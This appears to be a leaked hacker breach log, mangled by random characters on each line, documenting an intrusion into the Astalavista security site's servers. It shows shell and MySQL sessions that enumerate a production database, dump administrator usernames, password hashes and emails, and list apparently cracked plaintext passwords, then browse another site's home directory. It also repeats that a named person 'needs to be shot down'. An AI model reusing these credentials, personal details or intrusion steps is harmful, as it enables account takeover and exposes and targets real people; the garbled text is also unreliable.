Q3 G/ H q( ~4 u f <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
3 C8 T: k6 @9 H9 g4 \ <docs>http://blogs.law.harvard.edu/tech/rss</docs>9 v$ Q q P; e- t' A6 g q) `
<generator>Astalavista.com</generator>8 U2 j/ r3 p4 a% q3 ~
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
6 W; V X' k5 V& h8 Q) s6 c </channel>
% y4 T' V1 J. v' J</rss>’;! y/ Z5 {: Y: y5 ~7 P. Y5 z
' M& v0 }5 ?3 K& J# {# @. I
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {0 |7 i- o. r5 E j+ v% y1 q
unlink (FULLPATH . ‘/feed/exploits.xml’);. Z- ^3 `6 q- w7 F
}+ {. m$ T R1 |3 U- W3 S& ~
$ f9 J3 X- t/ w. X. W
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);% l4 g0 v8 G9 Z6 W" ^
[snip]! U% ~$ b& C7 G' w
1 e' j3 E$ N- v6 E' ?% ^* Zsh-3.2$ cat exploits.sh
O% k. J% b6 e7 L- ^! P#!/bin/sh, \& R' X0 ~- o
( Q6 D7 l1 z s# B& _7 O###########################################################+ ~) ~1 x- _( o. S; S( k- s
# #
2 {0 ~; N/ x, U6 P9 z$ ?# Title: milw0rm exploits adder #
$ G4 ^! J( v) r$ f7 d2 D# Description: Add all milw0rm exploits to the #
8 J. V) h, c" N$ X# Astalavista.com database #) d u2 ^- |# ~9 R. L
# #
& |5 A( N- o" A' G- P( W+ c# Company: Astalavista Group #. `1 L; I1 N" @0 s, m$ _% _# |) t
# Author: Paulo M. Santos #
: \% e6 O3 p$ n2 z4 B% ]9 k# E-Mail: 链接标记paulo.santos@astalavista.ch #2 M' i2 {/ q2 a; |4 k$ }
# #
$ U3 ]8 O( ?$ F# q0 a* u###########################################################
# x5 z h$ A9 p& _4 ] L1 \8 E3 \5 h, l: K
# path
, @/ Q+ q6 i5 T/ n0 W) ythis_path=/home/com/public_html/modifications/cronjobs
8 F& j. U) _: q7 e
2 F" {( e% c, F# change directory
M. X5 _6 C) _; [3 tcd $this_path5 }: p, i: B; \5 O
cd tmp/
% y0 z# q: ]# Y) f/ N' ~5 B2 h- ^! G
6 D8 `. Z6 D u( y) F. B2 z# delete files+ G9 n+ Y/ ]7 Q/ U
rm -rf milw0rm.tar.* &* I9 y6 }5 X: \7 K }! f
rm -rf milw0rm/ &
?# r" |1 c7 H4 E- |: B; k, Z
7 _& ^/ O8 D3 |) P1 j3 I) ~ r# wget milw0rm paket
& w5 T& {/ o5 Y* u! e) Iwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]1 Q0 L" H& w/ P) Q+ _
4 Q1 d3 _5 n. y P- Q$ D3 D# extract milw0rm paket
' D& U2 }9 W1 h1 ktar -xvf milw0rm.tar.bz2
; P7 Y1 w. k& m r* @6 y" X( w7 o8 m3 s7 y0 g
# change owner
# ^2 ?. b) H/ L: A( Achown -R com .: L9 U6 d9 {% n( {! q( K7 g
chgrp -R com .
( b- R* \$ X' t' i4 j
0 p, n* h, b6 S+ ?) F S" W% K6 \# execute php script
" v$ k X0 g, {! q/ D" `cd $this_path5 B% S$ K& ~; \; t6 S) c! c" }
php -q exploits.php
; P6 ?6 |4 Q+ Y) u$ `0 x' j' [% m+ l" G
# delete files% ~/ V/ ]/ j8 A
rm -rf tmp/milw0rm.tar.*
# U# i4 G3 y" g* S. \* n) f: J, Nrm -rf tmp/milw0rm/
4 V1 O/ n' N6 K/ T
; o' ~, e$ C1 \8 L; j# p6 L5 Jsh-3.2$ echo “Paulo M. Santos needs to be shot down.”$ x4 D/ X5 i3 q. D8 |
Paulo M. Santos needs to be shot down.- J2 q) f0 A1 `7 S$ m
G9 L& r, K" s) E3 a/ J9 r, I3 n
mysql -u contrexxuser2 -p+ f4 I, w$ c& k4 p: E$ Q
Enter password:- @& j% @( Y& `. }3 b$ ]/ X4 F* g
Welcome to the MySQL monitor. Commands end with ; or \g.4 |4 Y. R) Q9 D
Your MySQL connection id is 261694
$ t' o! \; u/ Q; }! D/ }9 e3 pServer version: 5.0.45-community-log MySQL Community Edition (GPL)8 w( _ ^( `" t$ r/ K
3 k/ Y4 }, ^4 l; i
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.5 j! ]/ b! _& b9 K$ o- m+ x
7 ~. Q Q3 P" O& s+ ~
mysql> show databases;
5 z/ c6 [5 B3 X. C+——————–+* J% _; |* h% @! W5 ~# x2 U
| Database |
# X, U# F5 @+ J+——————–+
* K2 a& h- `) X9 f! v5 n| information_schema |
7 g% D- S/ I4 _1 ^2 N| com_contrexx2 |( ]0 P7 {! D6 T" g- c4 k
| com_contrexx2_live |
( V' p' ^5 s% c5 e| test |7 o( c' ~7 c) ^+ p
+——————–+2 c$ N) ?# G/ T
4 rows in set (0.00 sec)% P8 T9 r. _( S6 q
) ^' s- v6 A8 I2 r! K9 l
mysql> use com_contrexx2_live
, w3 U9 T! v i$ k: ~Database changed$ e! Z, K$ ^7 F- Q8 l r( J4 n
mysql> show tables;
5 b% J* u8 P7 G2 A" H- f0 E# |- i+————————————————–+- r! u3 m+ A# c5 \6 I
| Tables_in_com_contrexx2_live |
2 x5 c6 x# ]# K3 n+————————————————–+
1 U5 k% b* e7 l| cc_banner_counter |) V0 g: r. g; o) H: c* ?' w! z( A$ S
| cc_search_counter |
1 A* c/ M+ f& w: O| contrexx_access_group_dynamic_ids |! v1 o* P. p p: m* j
| contrexx_access_group_static_ids |) V7 A0 K" ?5 H# A( C; l( D- _
| contrexx_access_rel_user_group |) v4 b. M& h) Q4 j% j5 `) U. C
| contrexx_access_settings |- o% _$ U1 c0 L- ^3 q) y
| contrexx_access_user_attribute |: V, a% a0 M4 q' z( ~% W# f& I5 Q! g
| contrexx_access_user_attribute_name |: ]) G ^! `6 s! R7 m
| contrexx_access_user_attribute_value |2 R( d8 i& |; |0 I3 [
| contrexx_access_user_core_attribute |, }6 r9 S$ x, W5 c E' c3 U* D
| contrexx_access_user_groups |& K: G+ e: `- { C
| contrexx_access_user_mail |! H! L# l2 [9 R5 G6 l4 k! F
| contrexx_access_user_profile |
/ H# e# r) Y2 D' d+ m* d" Y| contrexx_access_user_title |" \! R: p: c& E4 ]( E
| contrexx_access_user_validity |
/ L& x- F! R% @4 E" P$ D0 K9 z| contrexx_access_users |
7 t: L% t, R6 u, r& x| contrexx_backend_areas |: ^; |" ^/ e3 y' v6 X4 \% u8 l
| contrexx_backups |
8 }% e8 ^* K+ _; [& W+ ?) P! T| contrexx_content |
; C. f8 w/ x8 n* `, k/ q| contrexx_content_history |
, i$ |7 z- E: |. X| contrexx_content_logfile |: w' }; k! ^4 V; B' w" U
| contrexx_content_navigation |
9 C/ ?8 w- j, j8 t; j| contrexx_content_navigation_history |
8 `6 Y$ X6 J' @0 E( e6 X| contrexx_ids |
# z4 C0 P0 |3 @% ~' [3 @| contrexx_languages |
; O( G9 a/ N" r- j% Y| contrexx_lib_country |
. b$ t" n1 m9 L5 }- f' Y3 @| contrexx_log |9 p" m( t- s9 u$ p0 j
| contrexx_module_alias_source |# z; E4 n4 S% c/ d
| contrexx_module_alias_target |# V9 d" N! F# ?( V+ B
| contrexx_module_block_blocks |
3 P2 D3 a0 `0 e2 e: V! s! q| contrexx_module_block_rel_lang |: l3 ~9 K% b' ^! K
| contrexx_module_block_rel_pages |- A" A) j/ P5 s F
| contrexx_module_block_settings |$ E0 P, G, S2 I0 e
| contrexx_module_blog_categories |
2 M( w i$ P& f, F0 }1 x| contrexx_module_blog_comments |/ s$ x0 T; D7 f; l
| contrexx_module_blog_message_to_category |
' Q: v6 W, T1 T6 N. ~| contrexx_module_blog_messages |
# j+ t, Q& b3 R$ z! j8 A; a# G4 Q5 e| contrexx_module_blog_messages_lang |
) M7 J: ?% s. x8 O5 d| contrexx_module_blog_networks |% H0 U5 d! M2 t: }0 e( ?. R
| contrexx_module_blog_networks_lang |8 ]( [5 e' A( l, H6 v
| contrexx_module_blog_settings |8 c5 S/ `/ ~* k1 j0 M
| contrexx_module_blog_votes |
, a* d" o7 j5 D1 r, a| contrexx_module_calendar |
- C9 N6 x2 i1 K| contrexx_module_calendar_access |
$ Y) P! |' P0 S1 q7 h| contrexx_module_calendar_categories |
) Q% L( c% s- X6 F: T5 T5 ]/ o, {| contrexx_module_calendar_form_data |
, ]; `# H4 |0 f( _| contrexx_module_calendar_form_fields |
& l6 n5 E$ S C| contrexx_module_calendar_registrations |
! U$ h' y3 Q+ b| contrexx_module_calendar_settings |
) l' U( c# G( j' ?: l m| contrexx_module_calendar_style |- k( X4 [" _6 I+ k
| contrexx_module_contact_form |; k( U3 j, T- h7 W
| contrexx_module_contact_form_data |- g0 L1 l/ C4 c6 M3 U: E/ n
| contrexx_module_contact_form_field |
* _- i- l$ j" F| contrexx_module_contact_settings |
. E( y% ?% H. T& Q; G' V8 s| contrexx_module_data_categories |6 }6 e) E3 e5 w+ O
| contrexx_module_data_message_to_category |
" f* I7 B. c5 n" [| contrexx_module_data_messages |4 X, Y. S1 c+ K
| contrexx_module_data_messages_lang |
7 @1 }3 v5 w5 Y8 \) {| contrexx_module_data_placeholders |
8 S+ u6 w/ V$ _& n: {* J5 z| contrexx_module_data_settings |; Y9 e% Q0 C. x5 O) `( f
| contrexx_module_directory_access |
: \) @ o5 t) c- S' F% }* k3 v! || contrexx_module_directory_categories |
) B6 K, a3 g/ J- F0 z5 w1 \| contrexx_module_directory_dir |
0 u. s- H$ v) w3 a| contrexx_module_directory_inputfields |0 b' \2 y9 V5 I) {8 T; e L& k
| contrexx_module_directory_levels |
$ v1 v: b v5 ~# S0 [4 j" H5 U| contrexx_module_directory_mail |2 `) n Y% O6 p" @
| contrexx_module_directory_rel_dir_cat |0 W) l! W9 h# R
| contrexx_module_directory_rel_dir_level |! z9 n. W c7 T' p" ]' P% a
| contrexx_module_directory_settings |
. W9 @' p- E$ N9 f6 C| contrexx_module_directory_settings_google |
# x7 ]! \# j. [- N3 e! K| contrexx_module_directory_vote |) y7 r. h- r8 z! t. R
| contrexx_module_docsys |
9 b, R" g; I. s, B" R| contrexx_module_docsys_categories |6 d; E4 m' a& P: I8 ^
| contrexx_module_egov_configuration |
; X$ A, Y/ C' g( k, |( i9 Q| contrexx_module_egov_orders |; ?: ~6 d3 P2 J w
| contrexx_module_egov_product_calendar |
* ^) D4 i: ]) z M4 V| contrexx_module_egov_product_fields |& B6 ^, _2 A7 p
| contrexx_module_egov_products |1 p, K4 h! Q8 J( Q3 E7 W7 h
| contrexx_module_egov_settings |8 j" a( W$ ^5 R. c6 C+ }
| contrexx_module_exploits |
$ A- E9 o) z1 R3 Z* h* D) e2 u| contrexx_module_exploits_categories |7 j( n" U \- G% e; z# N
| contrexx_module_feed_category |
. i0 v. E7 Y0 M8 Q# v8 P5 N| contrexx_module_feed_news | D. a- U8 ~ J9 }5 u
| contrexx_module_feed_newsml_association |
1 e1 ?" ^) [( @% D% t. G| contrexx_module_feed_newsml_categories |+ q& U1 }; n! U
| contrexx_module_feed_newsml_documents |6 X$ t) _ [( m e0 C! m
| contrexx_module_feed_newsml_providers |
! b9 `& v# |6 I( j8 z| contrexx_module_forum_access |. x- a! f8 m2 L
| contrexx_module_forum_categories |) u R* S8 _: v
| contrexx_module_forum_categories_lang |
/ l4 L- O& I9 F8 _' v; H2 E6 Y| contrexx_module_forum_notification |
" \+ t- `0 ^ U! z( ~( `* F9 F| contrexx_module_forum_postings |; t7 F+ ?5 L+ s8 C3 p6 N
| contrexx_module_forum_rating |7 C/ m% u! J% C
| contrexx_module_forum_settings |
$ h+ W% a( R* k$ t/ _9 q/ l| contrexx_module_forum_statistics |
) s/ S. O0 ?' n, F| contrexx_module_gallery_categories |
2 B# c; e! j0 p' N$ z6 a- ^| contrexx_module_gallery_comments |% `# r2 c! l; _1 }' a
| contrexx_module_gallery_language |9 J. h: P3 B/ s- U; I( G {
| contrexx_module_gallery_language_pics |6 G' U( ]5 w! r2 b
| contrexx_module_gallery_pictures |' f, f% y' j- g' h4 f
| contrexx_module_gallery_settings |
9 c# r' a5 P+ Y( @8 n. H| contrexx_module_gallery_votes |
l5 s% R* z9 || contrexx_module_guestbook |/ w/ ?5 ^$ K/ ?4 l* E3 i1 p) b
| contrexx_module_guestbook_settings |
$ L( [/ h1 a4 M9 F| contrexx_module_livecam |7 f! }- y# N0 b, V. W$ Y
| contrexx_module_livecam_settings |) q* Z5 c. p% W3 {
| contrexx_module_market |
* m8 N1 V" g: r+ B( r8 A& u| contrexx_module_market_access |
! H8 M7 ?/ {# d5 Q| contrexx_module_market_categories |
7 _- g2 W5 ^3 w2 X y| contrexx_module_market_mail |
/ e. ^/ }5 i1 u# T- N# C| contrexx_module_market_paypal |8 g S n: @; r* [8 x" O
| contrexx_module_market_settings |
5 D! g' s% m2 ?: j3 Y' M| contrexx_module_market_spez_fields |& K, a) O- G& V5 i c1 C
| contrexx_module_mediadir_access |
( F- V p0 F: h8 G% ~& k| contrexx_module_mediadir_categories |8 s) G% b* j b' A- _1 [7 w2 E
| contrexx_module_mediadir_comments |
* X p \( V( B! T| contrexx_module_mediadir_dir |' g( w: E& O& y
| contrexx_module_mediadir_inputfields |7 }2 R3 W9 i/ S- ^, y1 Z
| contrexx_module_mediadir_levels |2 u. y9 s# g/ F) f e$ W/ V4 q
| contrexx_module_mediadir_mail |
, `4 M. g7 z4 C1 S| contrexx_module_mediadir_rel_dir_cat |
' V( F5 n; l. v| contrexx_module_mediadir_rel_dir_level |; p5 _: r4 W7 S# }7 U; E
| contrexx_module_mediadir_reports |6 L3 X8 n) T$ h# a' w7 a
| contrexx_module_mediadir_settings |! v% q6 H' B. k& D$ U- B" a
| contrexx_module_mediadir_settings_google |0 ~! e, _; X: R
| contrexx_module_mediadir_vote |
2 _( [% T$ U6 L, n) Y| contrexx_module_memberdir_directories |* M5 G8 _& N' p& v
| contrexx_module_memberdir_name |" ?+ ]" r( p. @: c5 G" e
| contrexx_module_memberdir_settings |' {7 |$ r- `# B) {/ I$ I
| contrexx_module_memberdir_values |- y4 R) `0 H8 I" \6 H
| contrexx_module_nettools_allowed_groups |
3 G4 l6 V2 K; r| contrexx_module_nettools_settings |2 ?1 U; @5 @# Y2 A6 h
| contrexx_module_news |6 C+ _& a7 u3 H7 M/ R
| contrexx_module_news_access |
. i( e; G% n7 A# I4 f; I| contrexx_module_news_categories |
% }# @( y1 a3 b7 T- c7 m| contrexx_module_news_settings |. z+ s/ E7 _( b1 L
| contrexx_module_news_teaser_frame |
5 E; S9 d% f2 a( q3 }| contrexx_module_news_teaser_frame_templates |+ |" }# }+ i% k/ e8 K
| contrexx_module_news_ticker |
- G6 a( l0 e7 V" l' x| contrexx_module_newsletter |' @: e8 b. \6 j" T4 F' w
| contrexx_module_newsletter_attachment |- O( \1 t* Z" a
| contrexx_module_newsletter_category |
: @0 a+ L, [% N' `* S6 L9 S: _/ O| contrexx_module_newsletter_confirm_mail |3 p* [( d$ N g
| contrexx_module_newsletter_rel_cat_news |
) l' Y7 i, u) G9 O- n6 M* C, B% g| contrexx_module_newsletter_rel_user_cat |' o* L8 d" w- r
| contrexx_module_newsletter_settings |
/ n/ z. s4 x3 F7 c) W# D| contrexx_module_newsletter_template |
1 Q0 K& Y" q( h2 X8 Y" l' n7 M| contrexx_module_newsletter_tmp_sending |& \! u8 Z% O* w
| contrexx_module_newsletter_user |
% B7 D/ A9 v; U8 e| contrexx_module_newsletter_user_title |# w5 y; \" P+ C, T4 j$ }
| contrexx_module_onlinetools_defaultports |6 \( \* b/ C; J Y
| contrexx_module_onlinetools_defaultports_back |9 Q: Q/ Q8 m( C4 B0 E/ @# N. B( h6 _5 ?
| contrexx_module_onlinetools_geolitecity_blocks |% X1 @$ J: [2 M' [+ N; @
| contrexx_module_onlinetools_geolitecity_country |9 v% B% p& T# O* _# C3 O
| contrexx_module_onlinetools_geolitecity_location |+ P6 F B5 l' @% F7 R
| contrexx_module_podcast_category |. Q5 {# s* y( k4 n. A
| contrexx_module_podcast_medium |: L6 }" Q1 P+ X. o, i1 n
| contrexx_module_podcast_rel_category_lang |
6 {5 }6 }+ t1 h) |( O/ [| contrexx_module_podcast_rel_medium_category |
" s* o# ?0 v! i7 E| contrexx_module_podcast_settings |
! n* O4 z( V4 t* ]| contrexx_module_podcast_template |+ d8 \8 P2 `6 `& U2 u2 v) P
| contrexx_module_proxydb |
$ P y B4 x" u+ L, p" p. m% z4 _5 S5 z| contrexx_module_recommend |% Q) E( K! p* i+ B% J. z/ p
| contrexx_module_repository |5 p n( A j; u( T
| contrexx_module_securitynews_cats |
; L5 ^+ {! x' {0 J( Z| contrexx_module_securitynews_feeds |# K3 e* M) n6 v& M' P! R
| contrexx_module_securitynews_news |/ s4 x S5 u9 V% F' C* e
| contrexx_module_shop_categories |7 d0 T _9 @$ o; `
| contrexx_module_shop_config |
' N, i( R2 X# l/ ?8 ~| contrexx_module_shop_countries |
+ M" x! I0 R8 U3 w; G4 L8 |$ i| contrexx_module_shop_currencies |
9 }, w" j+ E, A3 v! [- O0 Q0 d| contrexx_module_shop_customers |
; \8 y7 L4 P9 k% N| contrexx_module_shop_importimg |2 j0 B' h) P+ t( A
| contrexx_module_shop_lsv |
3 S* ]/ B% ~6 O Q n* Z| contrexx_module_shop_mail |
2 {5 S4 V: D2 @" `| contrexx_module_shop_mail_content |
2 U4 D2 }/ |1 T5 W1 Y3 b| contrexx_module_shop_manufacturer |
" B3 m8 g y5 c4 f6 l4 ^| contrexx_module_shop_order_items |7 r. y6 H3 X7 y* q3 i
| contrexx_module_shop_order_items_attributes |
& p5 h( Q/ C: ~ P! || contrexx_module_shop_orders |( q8 c# l% B: q5 U
| contrexx_module_shop_payment |( x; w0 j3 [; y% O, ?
| contrexx_module_shop_payment_processors |& l: k6 @- D1 \* A* s
| contrexx_module_shop_pricelists | H% [& H7 `5 e7 C9 s0 |
| contrexx_module_shop_products |
- h1 Q; Q" i# @( `" v$ U/ M1 L1 w| contrexx_module_shop_products_attributes |
3 ^. W1 s* I+ t' k$ m# {" P' R# A) R| contrexx_module_shop_products_attributes_name |2 L4 N+ S ^3 e# T( j# ~, w$ |
| contrexx_module_shop_products_attributes_value |
0 i* ^; I% w1 Y$ }7 x# Y| contrexx_module_shop_products_downloads |
+ f) Z& J+ O/ G1 `+ q e' z" g| contrexx_module_shop_rel_countries |0 ]3 k( h0 o4 T8 m0 k+ G
| contrexx_module_shop_rel_payment |
3 |1 B- G. H* E4 i7 _1 F2 D| contrexx_module_shop_rel_shipment |1 K: U6 d; R% |
| contrexx_module_shop_shipment_cost |
8 f, R$ G5 G" N, v- w0 T: }* n| contrexx_module_shop_shipper |
, \ b. e2 R- K, X+ j( @: b, i( h| contrexx_module_shop_vat |
( j4 @' |2 K0 g, i" w| contrexx_module_shop_zones |
/ G3 E- b' @4 ^; a6 J+ R+ x* \+ \4 k| contrexx_module_u2u_address_list |
% l- ?. f: W- A% S9 y- b0 e| contrexx_module_u2u_message_log |# K5 O' s% E& O2 S7 `: p
| contrexx_module_u2u_sent_messages |# F( D/ G2 A& Q8 {3 T4 ]
| contrexx_module_u2u_settings |; k% x6 T8 l( q3 w
| contrexx_module_u2u_user_log |0 R% W6 b9 B1 E7 b. U& W' l0 R
| contrexx_modules |5 k) g; f, B8 _6 i( D2 E, a! s
| contrexx_sessions |
9 B9 U) j Q4 n% j| contrexx_settings |
: d( _ u8 x/ {6 x$ j+ j- p| contrexx_settings_smtp |
4 ^+ B' j/ X/ z4 h| contrexx_skins |
2 l; g+ P! U3 r M3 u' @# V| contrexx_stats_browser |$ t p3 g, R+ A4 e& v
| contrexx_stats_colourdepth |
! q- K; d4 N, @| contrexx_stats_config |$ B }. E4 D: U3 y& q# v
| contrexx_stats_country |) [/ h$ F) s4 Q) ?% h6 f2 a
| contrexx_stats_hostname |
" `+ I( {. j1 k% D0 i| contrexx_stats_javascript |+ z! E, H8 u& o$ ?7 s$ q* O
| contrexx_stats_operatingsystem |5 w' _' U8 O( n* R5 r0 K
| contrexx_stats_referer | W8 i) z: l/ {
| contrexx_stats_requests |
% a0 B- ~1 I) e2 I1 p L| contrexx_stats_requests_summary |
4 ~3 K8 m3 P& C2 Q5 q| contrexx_stats_screenresolution |! g8 y- `* ?9 s5 L6 L& u
| contrexx_stats_search |. D2 |9 I6 q: i4 }+ k5 ~% N, f
| contrexx_stats_spiders |
' r3 I7 F2 X! i; G8 L5 l" F" J8 V| contrexx_stats_spiders_summary |0 W& u5 v/ I/ {1 W2 Y# Y
| contrexx_stats_visitors |
6 ]( u: k7 G" r% F! V3 i0 O| contrexx_stats_visitors_summary |' e0 K/ T$ I) z. t
| contrexx_voting_additionaldata |0 C# G" T8 X9 b. H6 i
| contrexx_voting_email |
$ z* E$ n$ a# B3 i5 g| contrexx_voting_rel_email_system |3 E1 M( ?! {, y- M: F$ L2 i) C }
| contrexx_voting_results |: f( I1 Q- ]( x
| contrexx_voting_system |
% v0 `/ i L+ `5 V2 I$ M3 e% f# Z| foo |
2 n% p) E* K. P# W8 ~+————————————————–+% F- r8 {6 N7 L R; c
227 rows in set (0.01 sec)
$ ?* r. i \3 p6 ^! z2 R
& s# A: Z2 T- O" ^0 A5 [2 o7 O; a- n1 vmysql> select count(*) as skids from contrexx_access_users;7 ]& _; l4 }7 ]$ P
+——-+
* ~& q. q* v. j$ t* s" _( r| skids |
2 r+ \; g9 q: ?- L/ [3 B* |; ?+——-+* s6 h- H k: D4 L- A# \
| 53699 |% P9 m. V* T) I1 Y1 Y/ N
+——-+
; V0 f) a. k- h9 X) l- X9 h; i1 row in set (0.00 sec)
; a* d( I; \+ c$ I$ T3 Z5 D0 i$ _2 U
mysql> describe contrexx_access_users;# Q0 Q6 Z) L% I" A6 w# }
+——————+——————————————+——+—–+————–+—————-+
3 m+ {3 B( Q( k/ r& p+ L$ k| Field | Type | Null | Key | Default | Extra |
$ X. T1 G: l* E1 M* \) n+——————+——————————————+——+—–+————–+—————-+
/ l+ D# U, Y9 M- h! `) d4 l/ J, O| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 K I& a( c5 a$ p| is_admin | tinyint(1) unsigned | NO | | 0 | |1 I* q! B& \3 y' a
| username | varchar(40) | YES | MUL | NULL | |- W! }$ u$ ], E# G) Z
| password | varchar(32) | YES | | NULL | |
, p, }. V! p; c3 `: x/ x% g* J' e3 || regdate | int(14) unsigned | NO | | 0 | |0 r B0 x$ t3 ^; u$ H
| expiration | int(14) unsigned | NO | | 0 | |6 e) u9 J! E4 O( }$ h/ r2 j# G
| validity | int(10) unsigned | NO | | 0 | |
- c9 a: o, B6 a7 O5 L' F9 R2 q. N| last_auth | int(14) unsigned | NO | | 0 | |# N, G9 G+ D. d% b+ A7 P
| last_activity | int(14) unsigned | NO | | 0 | |
2 d+ o5 o1 z) G3 k) U, t| email | varchar(255) | YES | | NULL | |
: Z5 d4 \- m3 e0 @| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |# `4 ?* y$ I% {, @, T
| frontend_lang_id | int(2) unsigned | NO | | 0 | |8 j9 b' L! V* M3 Z( [
| backend_lang_id | int(2) unsigned | NO | | 0 | |8 a6 [% I# ]* o( c1 g' T7 n* [
| active | tinyint(1) | NO | | 0 | |
D A/ {+ |' @* T& L% c8 u* V# h| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |9 _; c( T6 y; Z4 {, x- k0 ~+ |1 b
| restore_key | varchar(32) | NO | | | |9 K# [2 x- W/ s6 q9 ^+ e# ?
| restore_key_time | int(14) unsigned | NO | | 0 | |
8 O' C, W( Q, p5 S' x9 S| u2u_active | enum(’0′,’1′) | NO | | 1 | |) f( b+ x" U b
+——————+——————————————+——+—–+————–+—————-+
0 o! ]9 [& `/ }: m% a: r7 X6 {& y18 rows in set (0.00 sec)
9 S0 H3 g' Q6 V X+ `9 J% m' S
. Z5 |& F/ }; J! c4 V5 Ymysql> select username,password,email from contrexx_access_users where is_admin = 1;! F$ {* f0 E) q, E0 q3 o3 A6 C4 s
+————+———————————-+—————————–+1 a/ h0 T# |/ K! `
| username | password | email |
7 R: W. E/ M+ ]* U4 e$ l+————+———————————-+—————————–+
( R0 a p* E$ y! D& b; P| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
+ F. w" p) _4 W. P7 ^% K; _: N| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |7 K, _5 N+ B) d, t3 D" x2 y
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |2 z' `6 J" l* U( M5 w
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |6 d/ s2 b" x) g) _
+————+———————————-+—————————–+
( k1 K2 `. Y1 p R4 rows in set (0.04 sec): r1 m7 c0 T* L- I. G
$ g0 }6 q5 W2 I$ V4 H2 J5 B
mysql> exit;6 o5 Q U$ ^% J3 C. k5 E. a t! M) s
Bye
3 |, G, Z6 F# F5 N1 ^
9 ^$ c" [ @) B- s. X9 H[~] There you go, your “team of security and IT professionals” is a joke./ M5 Z1 l5 T p( w
4 ]% K% J9 }4 B; Q. e R+——————————+
5 h0 i8 ^6 V& {, b9 R# m: h8 ]' Isystem:f82BN3+_*/ h4 g! F3 M9 S
Be1er0ph0r:belerophor4astacom6 o& L5 \ h+ G, M6 }
prozac:asta4cms!
8 a) Q6 e6 B Ocommander:mpbdaagf6m
7 ]8 i) c9 x/ c" L- R! ~sykadul:ak29eral1 R! Z* |- E4 g# ?* k! T
+——————————+% `5 ^% g% w9 a7 @
2 z6 G! x' t. k2 _[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
" W$ @! y5 q& a3 h, _, w2 f' b$ q…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.. S- {* v0 ?' k
7 X' \: j1 t3 n[~] Lets move to astalavista.net now,4 L5 Q; R5 h# D+ p# c- [
" `/ f$ n' J& D5 B* r: k* V2 gFrom <链接标记[url]https://www.astalavista.net/[/url]>:
" b3 q* M8 @7 y>> Everyone knows that the best defense is a good offense.
5 x( b( n4 ^( G+ y9 q1 }! F6 {, C>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.0 r4 f9 I% h3 r
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
/ ^0 j) ]: [$ d& p7 k>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
. j' T2 y% q( U. m3 a3 U
0 l! H. D, G& c9 ~: d% U2 D>> Go ahead, try and hack our server . in a completely legal way!
5 M/ ]3 p; f- f>> Learn by doing: We offer our members tricky tasks and challenges on an4 ]4 i) K8 L) K+ e7 Y& B8 ~2 j
>> ongoing basis so you can test your knowledge and abilities. You can also
) d7 F$ B' a. x' `>> demonstrate what you.ve mastered by taking part in regular hacker contests$ y7 M' S1 e& P( c( U
>> and war games
$ R* W. g% f8 O' Y- M' d, X; y3 A
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!" H4 p6 o" c3 p8 Z0 a
# z. J' J) b) P% m8 g0 c[-] Tricky task: Find home dir of astalavista.net* I% G$ J+ f/ P) H7 A: L% p
& H6 e Q: f3 r1 tsh-3.2$ ls -la ~astanet- J" s, J! E X
total 48 m: c4 p5 c9 W+ P( p
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .* h4 k& M, Q# ~) I+ m/ i+ D
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- Y9 r, V, x; O; Y
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
& S2 W# _+ A7 F0 J. O! g* |-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history% p( U* D7 V( b7 z
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout. n* K( _* E, v' y2 \2 }
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile( {$ z, U+ @6 V* F" w: k$ m; e
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc4 Y/ N& z. I& b
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
+ q' r% t: q, k6 ?5 Z. D( a3 E0 Sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap! H% C3 E+ ]/ u. P/ Q% S, q" ]
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail6 T/ T7 O4 I! x( } U, w e
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html0 a3 i. C+ \4 J; V
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
. W; Q% m/ q/ s8 `8 r; o2 x
6 j/ J2 P) Q" I! G# ysh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
/ i" F! @7 v- h4 a5 esh-3.2$ ls -la
1 y- }5 |( [$ Q( ptotal 200+ J* z! z2 s$ A8 A, u( {3 U& R4 C$ @
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .5 l% g- o6 E) E$ h
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ../ [/ B+ i8 P8 J: v5 O' f$ T: ]% I
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
+ w" d- |$ |2 u6 p9 o, A7 ~, idrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql D& w, Y( |. X8 B9 M
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com7 ^2 A. ?# C1 p! q5 ?0 I. L
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
